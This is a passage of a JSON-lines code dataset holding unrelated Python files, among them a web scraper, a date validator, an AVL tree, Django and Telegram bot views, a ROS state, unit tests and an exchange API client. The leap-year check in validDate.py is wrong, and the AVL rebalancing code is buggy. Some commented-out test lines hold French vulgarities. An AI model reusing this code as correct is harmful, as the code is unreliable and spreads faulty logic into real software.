Safari/537.36\"\n}\nrsp = requests.get(\"http://www.seputu.com/\",headers = headers)\nrsp.encoding = rsp.apparent_encoding\n# print(rsp.text)\nsoup = BeautifulSoup(rsp.text, \"lxml\")\ncontent = []\nmulus = soup.find_all(class_= \"mulu\")\n# print(len(items))\nfor mulu in mulus:\n # 标题\n big_title = mulu.find(name = \"h2\")\n\n if big_title !=None:\n big_title = big_title.string\n list = []\n # print(title)\n for a in mulu.find(class_= \"box\").find_all(\"a\"):\n href = a.get(\"href\")\n small_title = a.get(\"title\")\n print(href,small_title)\n list.append({\"href\":href,\"small_title\":small_title})\n content.append({\"big_title\": big_title,\"content\": list})\n# print(content)\n# str_content = str(content)\n# print(type(str_content))\nwith open(\"gcd.json\", \"a\", encoding=\"utf-8\") as f:\n json.dump(content,fp=f,ensure_ascii=False,indent=4)","sub_path":"习题班/数据存储/to_json.py","file_name":"to_json.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"561536594","text":"#File: validDate.py\n#Name: Carole(Chia Jung) Sung\n#Login Name: carole07@bu.edu\n#Assignment: Hw6 Part3\n#Date: Feb 6 2018\n#Description: Contains a function that takes parameters for the month, day, year and returns the boolean constant True if it's valid and False otherwise.\n\ndef valid_date(month, day, year):\n #Returns True if given a valid date and returns False otherwise.\n month31 = (1,3, 5, 7, 8, 10, 12)\n month30 = (4,6,9,11)\n #Checks if given month is in the sequence of months that have 31 days\n if month in month31:\n #Returns whether day is in valid range (boolean)\n return day <= 31\n #Checks if given month is in the sequence of months that have 30 days\n elif month in month30:\n #Returns whether day is in valid range (boolean)\n return day <= 30\n #Checks case for month of february\n elif month == 2:\n \n if year % 4 == 0 and year %400 == 0:\n #Leap year\n return day <= 29\n else:\n return day <= 28\n else:\n return False\n\n########################################\n \nprint(\"Test 
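The scraper above calls requests.get with no timeout and never checks the HTTP status, so a slow or failing server either hangs the script or hands BeautifulSoup an error page. A hedged hardening sketch of the same request:

rsp = requests.get("http://www.seputu.com/", headers=headers, timeout=10)
rsp.raise_for_status()  # fail loudly on 4xx/5xx instead of parsing the body
rsp.encoding = rsp.apparent_encoding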
Cases:\")\nprint(\"valid_date(2,7,2017):\",valid_date(2,7,2017))\nprint(\"valid_date(2,29,2017):\",valid_date(2,29,2017))\nprint(\"valid_date(1,32,2017):\",valid_date(1,32,2017))\nprint(\"valid_date(13,7,2017):\",valid_date(13,7,2017))\nprint(\"valid_date(4,31,2017):\",valid_date(4,31,2017))\nprint(\"valid_date(5,24,2008):\",valid_date(5,24,2008))\n\n","sub_path":"hw6/validDate.py","file_name":"validDate.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"88801891","text":"import sys\n\nclass Arbre:\n\t\n\tdef __init__(self, m):\n\t\tself.mot=m\n\t\tself.g=None\n\t\tself.d=None\n\t\t\n\t\t\n\tdef __str__(self):\n\t\treturn str(self.mot)\n\t\n\tdef arbrenouv():\n\t\treturn None\t\n\t\t\n\t##Fonction d'insertion\t\n\tdef insert(self, m):\n\t\tif(self.vide()):\n\t\t\tself=self.e(arbrenouv(),m,arbrenouv())\n\t\t\treturn self\n\t\tif m == self.r():\n\t\t\treturn self\n\t\tif m < self.mot:\n\t\t\tif self.g is None:\n\t\t\t\tself.g = Arbre(m)\n\t\t\telse:\n\t\t\t\tself.g.insert(m)\n\t\tif m > self.mot:\n\t\t\tif self.d is None:\n\t\t\t\tself.d = Arbre(m)\n\t\t\telse:\n\t\t\t\tself.d.insert(m)\n\t\tself=self.reeq()\n\t\treturn self\t\t\t\n\n\t\t\t\n\t\t\t\t\n\t\n\n\t\t\n\n\tdef r(self):\n\t\treturn self.mot\n\n\t\t\t\t\n\tdef rechercherMot(self, m):\n\t\tif self.vide():\n\t\t\treturn self\n\t\tif m == self.mot:\n\t\t\treturn self\n\t\tif m < self.mot:\n\t\t\treturn rechercherMot(self.g, m);\n\t\tif m > self.mot:\n\t\t\treturn rechercherMot(self.d, m);\n\t\t\n\n\tdef vide(self):\n\t\treturn self.mot is None;\n\t\n\tdef aff(self, level=0):\n\t\tif self.d:\n\t\t\tself.d.aff(level+1)\n\t\tprint(f\"{' ' * 4 * level}{self.mot}\")\n\t\tif self.g:\n\t\t\tself.g.aff(level +1)\t\n\n\tdef haut(self):\n\t\tif self == None:\n\t\t\treturn 0;\n\t\treturn 1 + max(self.g.haut() if self.g else 0, self.d.haut() if self.d else 0);\n\t\n\tdef reeq(self):\n\t\tif(self.deseq()==2 and (self.g).deseq()>=0):\n\t\t\tself = self.rd();\n\t\tif(self.deseq()==-2 and (self.d).deseq()<=0):\n\t\t\tprint(\"errr\")\n\t\t\tself.rg()\n\t\t\treturn self\t\n\t\tif(self.deseq()==2 and (self.g).deseq()==-1):\n\t\t\tself = self.rgd()\n\t\tif(self.deseq()==-2 and (self.d).deseq()==1):\n\t\t\tself = self.rdg()\n\t\treturn self\t\n\t\n\tdef rd(self):\n\t\tif (self.vide()):\n\t\t\treturn self\n\t\tif self.g.vide():\n\t\t\texit(1) \t\n\t\treturn self.e((self.g).g, (self.g).r(), self.e((self.g).d,self.r(),self.d))\n\n\n\tdef e(self, a, m, b):\n\t\tc = Arbre(m)\n\t\tc.g=a\n\t\tc.d=b\n\t\treturn c\n\t\t\t\n\tdef rg(self):\n\t\tif (self.vide()):\n\t\t\treturn self\n\t\tif (self.d.vide()):\n\t\t\texit(1)\n\t\t\n\t\treturn self.e(self.e(self.g,self.r(),self.d.g),self.d.r(),self.d.d)\t\n\n\t\n\n\tdef rgd(self):\n\t\tif (self.vide()):\n\t\t\treturn self\n\t\treturn self.e(self.g.rg(),self.r(),self.d).rd()\n\t\n\tdef rdg(self):\n\t\tif (self.vide()):\n\t\t\treturn self\n\t\treturn self.e(self.g,self.r(),self.d.rd()).rg()\n\t\t\t\n\tdef deseq(self):\n\t\tif(self.vide()):\n\t\t\treturn 0;\n\t\tif self.g == None and self.d == None:\n\t\t\treturn 0\t\n\t\tif self.g == None:\t\n\t\t\treturn 0 - self.d.haut()\n\t\tif self.d == None:\n\t\t\treturn self.g.haut()\n\t\treturn self.g.haut() - self.d.haut()\n\t\t\t\t\t\n\t\t\t\t\t\t\t\t\ndef getDictionnaire():\n\ta = Arbre(\"a\")\n\tfile = open(\"testdic.txt\", \"r\")\n\tlignes = file.readlines()\n\tfor ligne in lignes:\n\t\tmot = ligne.rstrip('\\n')\n\t\ta.insert(mot)\n\treturn 
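The February branch in valid_date above only accepts 29 days when the year is divisible by both 4 and 400, so ordinary leap years such as 2008 or 2020 fall through to the 28-day case (valid_date(2, 29, 2008) returns False). The Gregorian rule, as a sketch; the standard library's calendar.isleap implements the same logic:

def is_leap(year):
    # Divisible by 4, except century years, unless divisible by 400.
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)

# The February branch would then read:
#     return day <= (29 if is_leap(year) else 28)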
a\n\nsys.setrecursionlimit(10000)\t\n#dic=getDictionnaire();\nr=10000\na = Arbre(\"arbre1\")\n#a.insert(\"poney\")\n\n#a.insert(\"pute\")\n\n#a.insert(\"pedale\")\n\n#a.insert(\"putain\")\n\n#a.insert(\"pupupute\")\nb = Arbre(\"arbre2\")\nc =Arbre(\"thzda\")\nprint(\"---\")\nc.insert(\"z\")\nc.insert(\"zz\")\nc.insert(\"zzz\")\nr=c.deseq()\nt=c.d.deseq()\nprint(r)\nprint(t)\nprint(\"---\")\nc.insert(\"zzzz\")\nr=c.deseq()\nt=c.d.deseq()\nprint(r)\nprint(t)\nprint(\"---\")\nc.insert(\"zzzzz\")\nr=c.deseq()\nt=c.d.deseq()\n\nprint(r)\nprint(t)\nprint(\"---\")\nc.insert(\"zzzzzzz\")\nr=c.deseq()\nt=c.d.deseq()\nprint(r)\nprint(t)\nprint(\"---\")\nc.aff()\n\n\t\t\t\t\t\n#\t\t\t\t\t\n#if m < self.mot:\n#\t\t\tif self.g is None:\n#\t\t\t\tself.g = Arbre(m)\n#\t\t\telse:\n#\t\t\t\tself.g.insert(m)\n#\t\telif m > self.mot:\n#\t\t\tif self.d is None:\n#\t\t\t\tself.d = Arbre(m)\n#\t\t\telse:\n#\t\t\t\tself.d.insert(m)\n#\t\ta = self.reeq()\n#\t\tprint(a)\n#\t\tprint(\"----\")\n#\t\treturn a\t","sub_path":"DEV/python/Arbre.py","file_name":"Arbre.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"624087020","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 11 10:55:12 2021\r\n\r\n@author: vidhya\r\n\"\"\"\r\n\r\nfrom numpy import random\r\n\r\nrandom.seed(0)\r\n\r\n# Total number of number of people in a age group & purchases done by various age group\r\ntotals = {20:0, 30:0, 40:0, 50:0, 60:0, 70:0}\r\npurchases = {20:0, 30:0, 40:0, 50:0, 60:0, 70:0}\r\n\r\ntotal_purchases = 0\r\n\r\nfor _ in range(100000):\r\n age_decade = random.choice([20, 30, 40, 50, 60, 70])\r\n # the data is created such that purchases increases with age\r\n purchase_prob = age_decade / 100\r\n totals[age_decade] += 1\r\n if(random.random() < purchase_prob):\r\n total_purchases += 1\r\n purchases[age_decade] += 1\r\n \r\nprint(totals)\r\nprint(purchases)\r\nprint(total_purchases)\r\n\r\n# P(E|F) P(Purchase|age=30)\r\n\r\nPEF = purchases[30] / totals[30]\r\nprint('P(Purchase|age=30) : ' + str(PEF))\r\n\r\nPF = totals[30] / 100000\r\nprint('P(age=30) : ' + str(PF))\r\n\r\nPE = total_purchases / 100000\r\nprint('P(Purchases) : ' + str(PE))\r\n\r\n# P(E,F)\r\nprint('P(E,F) : ' + str(purchases[30]/100000))\r\n\r\n# only dep, then P(E,F) is not equal to P(E)P(F)\r\nprint('P(E)P(F) : ' + str(PE * PF))\r\n\r\nprint('P(E,F)/P(F) : ' + str(purchases[30]/(100000 * PF)))","sub_path":"Statistics/Conditional_Probablity.py","file_name":"Conditional_Probablity.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"593621680","text":"from django.conf.urls import include, url\r\n\r\nfrom homepage import views\r\n\r\nurlpatterns = [\r\n url (r'^$', views.Index.as_view (), name = 'homepage-index'),\r\n url (r'^accounts/profile', views.login_redirect, name = 'login-redirect'),\r\n url (r'^contact$', views.Contact.as_view (), name = 'homepage-contact'),\r\n url (r'^about$', views.about, name = 'homepage-about'),\r\n url (r'^faq$', views.faq, name = 'homepage-faq'),\r\n url (r'^game$', views.game, name = 'homepage-game'),\r\n url (r'^twibbon$', views.twibbon, name = 'homepage-twibbon'),\r\n url (r'^event/', include ([\r\n url (r'^nlc$', views.event_nlc, name = 'homepage-event-nlc'),\r\n url (r'^npc$', views.event_npc, name = 'homepage-event-npc'),\r\n url (r'^nst$', views.event_nst, name = 'homepage-event-nst'),\r\n url (r'^reeva$', 
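The conditional-probability script above derives P(E|F), P(F) and P(E,F) from the same simulated counts, so the identity P(E|F) = P(E,F) / P(F) must hold exactly; one assertion makes that explicit (a sketch reusing the script's variables):

# P(E|F) and P(E,F)/P(F) come from the same counts, so they agree
# up to floating-point rounding.
assert abs(PEF - (purchases[30] / 100000) / PF) < 1e-12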
views.event_reeva, name = 'homepage-event-reeva')\r\n ])),\r\n url (r'^', include ('auth_peserta.urls'))\r\n]\r\n","sub_path":"homepage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"233218020","text":"import time\r\nimport numpy as np\r\nfrom datetime import datetime, timedelta\r\nimport pyqtgraph as pg\r\nfrom pyqtgraph.Qt import QtGui\r\n\r\npg.setConfigOption('background', 'k')\r\npg.setConfigOption('foreground', 'w')\r\nmargin = 50\r\n\r\nweather_csv = '/Users/juan/Downloads/Weather Lab - Lab.csv'\r\ndates = list(map(lambda x: datetime.strptime(x, '%m/%d/%y %H:%M').timestamp(),\r\n np.genfromtxt(weather_csv, delimiter=',',\r\n skip_header=1, usecols=0, dtype=(str))))\r\ntemps = np.genfromtxt(weather_csv,\r\n delimiter=',',skip_header=1,usecols=1)\r\nhumes = np.genfromtxt(weather_csv,\r\n delimiter=',',skip_header=1,usecols=2)\r\n\r\napp = QtGui.QApplication([])\r\nwin = pg.GraphicsLayoutWidget(show=True)\r\nwin.setWindowTitle('Lab Weather')\r\nwin.setGeometry(80,80,1000,600)\r\nlabel = pg.LabelItem(justify='center')\r\nwin.addItem(label)\r\n\r\nhumidity_plot = win.addPlot(row=1, col=0, title='Relative Humidity',\r\n axisItems = {'bottom': pg.DateAxisItem()})\r\nhumidity_plot.showGrid(x=True, y=True)\r\nhumidity_plot.setMouseEnabled(y=False,x=False)\r\n\r\nhumidity_plot.plot(dates, humes, pen='r')\r\nrange_ = humidity_plot.getViewBox().viewRange()\r\nhumidity_plot.getViewBox().setLimits(xMin=dates[0], xMax=dates[-1])\r\n\r\nhumidity_plot.setContentsMargins(*(margin,0,margin,0))\r\nhumidity_plot.setLabel(axis='left',text='RH/%')\r\n\r\ntemperature_plot = win.addPlot(row=2, col=0, title='Temperature',\r\n axisItems = {'bottom': pg.DateAxisItem()})\r\ntemperature_plot.showGrid(x=True, y=True)\r\ntemperature_plot.setMouseEnabled(y=False)\r\n\r\ntemperature_plot.plot(dates, temps, pen='g')\r\nrange_ = temperature_plot.getViewBox().viewRange()\r\ntemperature_plot.getViewBox().setLimits(xMin=dates[0], xMax=dates[-1])\r\ntemperature_plot.setContentsMargins(*(margin,0,margin,0))\r\ntemperature_plot.setLabel(axis='left',text='T/C')\r\n\r\nselector_plot = win.addPlot(row=3, col=0, title='% RH',\r\n axisItems = {'bottom': pg.DateAxisItem()})\r\nselector_plot.showGrid(x=True, y=True)\r\nselector_plot.setMouseEnabled(y=False)\r\n\r\nselector_plot.plot(dates, humes, pen='r')\r\nrange_ = selector_plot.getViewBox().viewRange()\r\nselector_plot.getViewBox().setLimits(xMin=dates[0], xMax=dates[-1])\r\nselector_plot.setContentsMargins(*(margin,0,margin,margin))\r\nselector_plot.setLabel(axis='left',text='RH/%')\r\n\r\nregion = pg.LinearRegionItem()\r\nregion.setZValue(10)\r\nselector_plot.addItem(region, ignoreBounds=True)\r\n\r\ndef update():\r\n region.setZValue(10)\r\n minX, maxX = region.getRegion()\r\n if maxX > dates[-1]:\r\n region.setRegion([minX, dates[-1]])\r\n minX, maxX = region.getRegion()\r\n if minX < dates[0]:\r\n region.setRegion([dates[0], maxX])\r\n minX, maxX = region.getRegion()\r\n for aplot in [temperature_plot, humidity_plot]:\r\n aplot.setXRange(minX, maxX, padding=0)\r\n left_timestamp = datetime.fromtimestamp(minX)\r\n right_timestamp = datetime.fromtimestamp(maxX)\r\n label_text = '%s -> %s' % (left_timestamp.strftime(\"%b %d, %Y\"), right_timestamp.strftime(\"%b %d, %Y\"))\r\n label.setText(\"%s\" % label_text)\r\n\r\nregion.sigRegionChanged.connect(update)\r\nregion.setRegion([dates[-1] - 7*24*3600,dates[-1]])\r\n\r\nif __name__ == '__main__':\r\n 
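The weather dashboard above is the standard pyqtgraph overview-plus-detail pattern: a LinearRegionItem on the bottom selector plot drives the x-range of the plots above it. Reduced to its core (the plot names overview and detail are ours):

region = pg.LinearRegionItem()
overview.addItem(region, ignoreBounds=True)

def on_region_changed():
    lo, hi = region.getRegion()
    detail.setXRange(lo, hi, padding=0)   # keep detail in lockstep

region.sigRegionChanged.connect(on_region_changed)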
app.exec_()\r\n","sub_path":"gui/weather_stats.py","file_name":"weather_stats.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"57295942","text":"#!/usr/bin/env python\n\nfrom flexbe_core import EventState, Logger\n\nimport actionlib\nimport rospy\n\nfrom vigir_perception_msgs.msg import *\n\n\n'''\nCreated on 10/22/2014\n\n@author: Philipp Schillinger\n'''\n\nclass LocomotionPosePerceptionState(EventState):\n\t'''\n\tExtracts a pose of interest to walk to from environment data.\n\tNeeds to be tested and maybe updated.\n\n\t-- id_string string Identifier of the request. (?)\n\n\t#> target_pose PoseStamped Pose to plan to.\n\n\t<= detected Was able to detect the requested object and can provide a valid pose.\n\t<= failed Failed to detect an object of interest.\n\n\t'''\n\n\n\tdef __init__(self, id_string = \"\"):\n\t\t'''\n\t\tConstructor\n\t\t'''\n\t\tsuper(LocomotionPosePerceptionState, self).__init__(outcomes=['detected', 'failed'],\n\t\t\t\t\t\t\t\t\t\t\t\t\toutput_keys=['target_pose'])\n\n\t\tself._action_topic = \"/worldmodel_main/get_locomotion_target_pose\"\n\n\t\tself._client = actionlib.SimpleActionClient(self._action_topic, GetLocomotionTargetPoseAction)\n\t\tself._client.wait_for_server(rospy.Duration.from_sec(10))\n\n\t\tself._id_string = id_string\n\n\t\tself._failed = False\n\n\n\tdef execute(self, userdata):\n\t\t'''\n\t\tExecute this state\n\t\t'''\n\t\tif self._failed:\n\t\t\treturn 'failed'\n\n\t\tif self._client.wait_for_result(rospy.Duration.from_sec(0.1)):\n\t\t\tresult = self._client.get_result()\n\t\t\ttarget_pose = result.target_pose\n\t\t\tuserdata.target_pose = target_pose\n\t\t\tif target_pose is None:\n\t\t\t\treturn 'failed'\n\t\t\telse:\n\t\t\t\treturn 'detected'\n\n\n\tdef on_enter(self, userdata):\n\t\taction_goal = GetLocomotionTargetPoseGoal()\n\t\taction_goal.id_string = self._id_string\n\n\t\ttry:\n\t\t\tself._client.send_goal(action_goal)\n\t\texcept Exception as e:\n\t\t\tLogger.logwarn('Was unable to create pose perception request:\\n%s' % str(e))\n\t\t\tself._failed = True\n\n\n\n\n\n\n\n","sub_path":"ariac_behaviors/unit_2_behaviors/unit_2_flexbe_behaviors/src/vigir_behaviors-master/vigir_flexbe_states/src/vigir_flexbe_states/locomotion_pose_perception_state.py","file_name":"locomotion_pose_perception_state.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465170071","text":"\nimport os\nimport csv\nimport sys\nimport unittest\nfrom unittest.mock import patch\nfrom unittest import skip\n\nimport suduko\n\n\n\n\nclass test_suduko_file_validation(unittest.TestCase):\n\n test_argv = ['suduko.py', 'test.csv']\n \n @patch.object(sys, 'argv', test_argv[0])\n def test_complain_if_no_file_specified(self):\n \n with self.assertRaises(SystemExit) as context:\n suduko.validate_input_file()\n \n self.assertEqual(\n suduko.ERROR_NO_FILE_SPECIFIED, \n context.exception.code)\n\n @patch.object(sys, 'argv', test_argv) \n @patch('suduko.os.path')\n def test_check_file_exists_and_name_returned(self, mock_path):\n \n mock_path.isfile.return_value = False\n with self.assertRaises(SystemExit) as context:\n suduko.validate_input_file()\n self.assertEqual(\n suduko.ERROR_FILE_NOT_FOUND, \n context.exception.code)\n \n mock_path.isfile.return_value = True\n puzzle_file = suduko.validate_input_file()\n self.assertEqual(puzzle_file, self.test_argv[1])\n\nclass 
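In test_complain_if_no_file_specified above, sys.argv is patched with test_argv[0], a plain string, so len(sys.argv) becomes the string's length rather than 1; the "no file specified" branch is probably not exercised as intended. A sketch of the safer form (assuming suduko.validate_input_file inspects len(sys.argv)):

# Patch argv with a one-element list so len(sys.argv) == 1.
@patch.object(sys, 'argv', ['suduko.py'])
def test_complain_if_no_file_specified(self):
    with self.assertRaises(SystemExit) as context:
        suduko.validate_input_file()
    self.assertEqual(suduko.ERROR_NO_FILE_SPECIFIED, context.exception.code)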
test_suduko_check_solution(unittest.TestCase):\n \n def setUp(self):\n self.complete_puzzle = [\n [2,3,1,7,6,9,5,8,4],\n [5,4,6,3,1,8,2,9,7],\n [7,8,9,4,5,2,1,3,6],\n [6,5,3,2,9,1,4,7,8],\n [8,1,4,6,3,7,9,2,5],\n [9,2,7,5,8,4,6,1,3],\n [1,6,5,9,7,3,8,4,2],\n [3,9,2,8,4,6,7,5,1],\n [4,7,8,1,2,5,3,6,9]]\n \n # create test file\n with open('test.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',',)\n \n\n\n for x in self.complete_puzzle:\n writer.writerow([x])\n \n def tearDown(self):\n try:\n os.remove('test.csv')\n except:\n pass\n \n def test_puzzle_parsed_from_valid_file(self):\n parsed_puzzle = suduko.parse_file('test.csv')\n \n self.assertIsInstance(parsed_puzzle, suduko.Puzzle)\n self.assertEqual(parsed_puzzle.row[0], self.complete_puzzle[0])\n \nif __name__ == '__main__':\n unittest.main()\n \n'''\nReferences\n\nhttps://www.toptal.com/python/an-introduction-to-mocking-in-python\n\n'''","sub_path":"ut.py","file_name":"ut.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"580983595","text":"import numpy as np\n\ndef BlockMM(nr,nc,d,m,x1):\n \"\"\"Function used to compute the analytical solution.\n\n This functions takes an input matrix and reduces it's dimension to observation matrix doing some reshaping and sums.\n\n Args:\n nr: the vertical size of the observation\n nc: the horizontal size of the observation\n d: the scale factor\n m: No. of the pixels of the observation m = nr*nc \n x1: A matrix\n\n Returns:\n Modified matrix\n \"\"\"\n\n nr_x1,nc_x1 = x1.shape\n result=np.empty((int(nc_x1/nc)*m,int(nr_x1/nr)*1),dtype=np.ndarray)\n for i in range(0,nr_x1,nr):\n for j in range(0, nc_x1,nc):\n result[int((i/nr)*m):int((i/nr)*m+m),int(j/nc)]=x1[i:i+nr, j:j+nc].reshape((m,),order=\"F\") \n result=result.reshape((m,d),order=\"F\")\n result=np.sum(result, axis=1)\n return result.reshape(nr,nc,order=\"F\")\n\ndef INVLS(FB,FBC,F2B,FR,mu,d,nr,nc,m,regularization):\n \"\"\"Function to get the SR image.\n\n This functions allows one to get the super resolution image with the FSR algorithm.\n It gives the analytical solution as below :\n x = (B^H S^H SH + mu I )^(-1) R\n \n Args:\n FB: Fourier transform of the blurring kernel B\n FBC: conj(FB)\n F2B: abs(FB)**2\n FR: Fourier transform of R\n d: scale factor d = dr*dc\n nr,nc: size of the observation\n m: No. of the pixels of the observation m = nr*nc \n regularization : Regularization used in the model \n\n Returns:\n Xest->Analytical solution\n FX->Fourier transform of the analytical solution\n \"\"\" \n x1=np.divide(FB*FR,regularization)\n FBR=BlockMM(nr,nc,d,m,x1)\n invW=BlockMM(nr,nc,d,m,np.divide(F2B,regularization))\n invWBR=np.divide(FBR,(invW+mu*d))\n\n nr_FBC, nc_FBC=FBC.shape\n\n FBCinvWBR=np.zeros((nr_FBC,nc_FBC),dtype=np.complex64)\n for i in range(0,nr_FBC,nr):\n for j in range(0, nc_FBC,nc):\n FBCinvWBR[i:i+nr,j:j+nc]=FBC[i:i+nr,j:j+nc]*invWBR\n\n FX=np.divide(FR-FBCinvWBR,regularization)/mu\n Xest=np.real(np.fft.ifft2(FX))\n\n return Xest,FX\n","sub_path":"utils/INVLS.py","file_name":"INVLS.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"45052974","text":"# 给定一个二叉树,返回它的中序 遍历。 \n# \n# 示例: \n# \n# 输入: [1,null,2,3]\n# 1\n# \\\n# 2\n# /\n# 3\n# \n# 输出: [1,3,2] \n# \n# 进阶: ��归算法很简单,你可以通过迭代算法完成吗? 
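BlockMM in INVLS.py above reduces an (nr*a, nc*b) matrix to (nr, nc) by summing its nr-by-nc tiles, via Fortran-order reshapes. The same tile sum can be cross-checked with a single C-order reshape; a sketch assuming the input shape is an exact multiple of (nr, nc):

import numpy as np

def block_sum(x, nr, nc):
    # result[i, j] = sum over every nr x nc tile t of t[i, j];
    # this should agree with BlockMM up to floating-point ordering.
    a, b = x.shape[0] // nr, x.shape[1] // nc
    return x.reshape(a, nr, b, nc).sum(axis=(0, 2))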
\n# Related Topics 栈 树 哈希表 \n# 👍 711 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def inorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n\n \"\"\"\n 递归方案:执行耗时:20 ms,击败了67.63% 的Python用户\n \"\"\"\n\n # if not root:\n # return []\n # return self.inorderTraversal(root.left) + [root.val] + self.inorderTraversal(root.right)\n\n\n \"\"\"\n 迭代方案:执行耗时:20 ms,击败了67.63% 的Python用户\n \n 用栈来存储的解决方案\n 先建立一个栈。一个一个往里存,先访问左边子节点。如果是空,就把栈顶的点输出出来。\n 先用指针找到每颗子树的最左下角,然后进行进出栈操作\n \n \n 例子: 【A, B, C, D, E, F, null]\n \n A\n B C\n D E F\n 中序遍历:DBEAFC\n 栈的变化:\n D\n B B E F\n A A A A C C 出栈完毕\n \"\"\"\n if not root:\n return []\n\n node = root\n stack = []\n ans = []\n\n while stack or node:\n while node:\n # 压入结点\n stack.append(node)\n # 不断访问左边子节点。如果是空说明到达最左边,就跳出循环开始把栈顶的点输出出来\n node = node.left\n\n # 弹出栈顶的值\n node = stack.pop()\n ans.append(node.val)\n # 开始访问右子树\n node = node.right\n return ans\n\n\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"week02/[94]二叉树的中序遍历.py","file_name":"[94]二叉树的中序遍历.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"346029693","text":"import telepot\nimport json\nfrom django.shortcuts import render\nfrom django.template.loader import render_to_string\nfrom django.http import HttpResponseForbidden, HttpResponseBadRequest, JsonResponse\nfrom django.views.generic import View\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom .parse import parse_rss\n\ntelegramBot = telepot.Bot('')\n\n\ndef showPosts():\n return render_to_string('feed.md', {'items': parse_rss()[1]})\n\n\ndef showHelp():\n return render_to_string('help.md')\n\n\nclass BotView(View):\n def post(self, request, botToken):\n if botToken != '':\n return HttpResponseForbidden('Invalid token')\n\n commands = {\n '/start': showHelp(),\n '/help': showHelp(),\n '/feed': showPosts(),\n }\n\n raw = request.body.decode('utf-8')\n\n try:\n payload = json.loads(raw)\n except ValueError:\n return HttpResponseBadRequest('Invalid request body')\n else:\n chat_id = payload['message']['chat']['id']\n cmd = payload['message'].get('text')\n func = commands.get(cmd.split()[0].lower())\n if func:\n if cmd == '/start':\n (code, response) = parse_rss()\n if code == 200:\n telegramBot.sendMessage(chat_id, func)\n else:\n telegramBot.sendMessage(chat_id, 'Bad request!')\n else:\n telegramBot.sendMessage(chat_id, func)\n else:\n telegramBot.sendMessage(chat_id, 'Not valid command!')\n\n return JsonResponse({}, status=200)\n\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super(BotView, self).dispatch(request, *args, **kwargs)\n","sub_path":"yvision_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"503708112","text":"from datetime import datetime\n\n# local\nfrom . import constants as _c\nfrom . 
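A quick self-check of the stack-based traversal above, built from the [1,null,2,3] example in the docstring (the TreeNode stub is ours, mirroring the commented definition):

class TreeNode(object):
    def __init__(self, x):
        self.val, self.left, self.right = x, None, None

root = TreeNode(1)
root.right = TreeNode(2)
root.right.left = TreeNode(3)
assert Solution().inorderTraversal(root) == [1, 3, 2]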
import models as _m\nfrom ..base import Client\nfrom .server import CryptoMKTServer\n\n\nclass CryptoMKTPublic(Client):\n\n error_key = 'message'\n\n def __init__(self, timeout: int=30, return_json=False):\n super().__init__(CryptoMKTServer(), timeout)\n self.return_json = return_json\n\n def markets(self):\n url = self.url_for('market')\n data = self.get(url)\n return data['data']\n\n def ticker(self, market_id: str):\n url = self.url_for('ticker')\n params = {\n 'market': str(market_id)\n }\n data = self.get(url, params=params)\n if self.return_json:\n return data\n return _m.Ticker.create_from_json(data['data'])\n\n def order_book(self,\n market_id: str,\n order_type: str,\n page: int=None,\n limit: int=_c.ORDERS_LIMIT):\n params = {\n 'market': str(market_id),\n 'type': str(order_type),\n 'page': page,\n 'limit': limit\n }\n url = self.url_for('book')\n data = self.get(url, params=params)\n if self.return_json:\n return data\n return _m.OrderBook.create_from_json(\n data['data'], data['pagination'])\n\n def trades(self,\n market_id: str,\n start: datetime=None,\n end: datetime=None,\n page: int=None,\n limit: int=_c.ORDERS_LIMIT):\n if isinstance(start, datetime):\n start = start.strftime('%Y-%m-%d')\n if isinstance(end, datetime):\n end = end.strftime('%Y-%m-%d')\n params = {\n 'market': str(market_id),\n 'start': start,\n 'end': end,\n 'page': page,\n 'limit': limit,\n }\n url = self.url_for('trades')\n data = self.get(url, params=params)\n if self.return_json:\n return data\n return _m.Trades.create_from_json(\n data['data'], data.get('pagination'))\n","sub_path":"trading_api_wrappers/cryptomkt/client_public.py","file_name":"client_public.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"510124543","text":"#! 
